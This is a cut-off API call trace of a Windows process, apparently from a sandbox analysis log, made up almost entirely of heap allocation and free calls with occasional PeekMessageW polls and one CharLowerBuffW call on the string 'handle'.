[0161.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0161.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba330 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd978 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba018 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0161.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0161.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd960 [0161.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0161.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0161.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0161.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0161.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0161.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0161.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0161.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.573] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.573] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.574] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0161.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0161.575] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.576] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.576] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.577] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0161.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0161.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0161.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0161.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0161.578] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0161.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0161.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0161.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0161.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0161.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0161.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0161.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0161.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0161.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0161.579] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0161.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0161.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 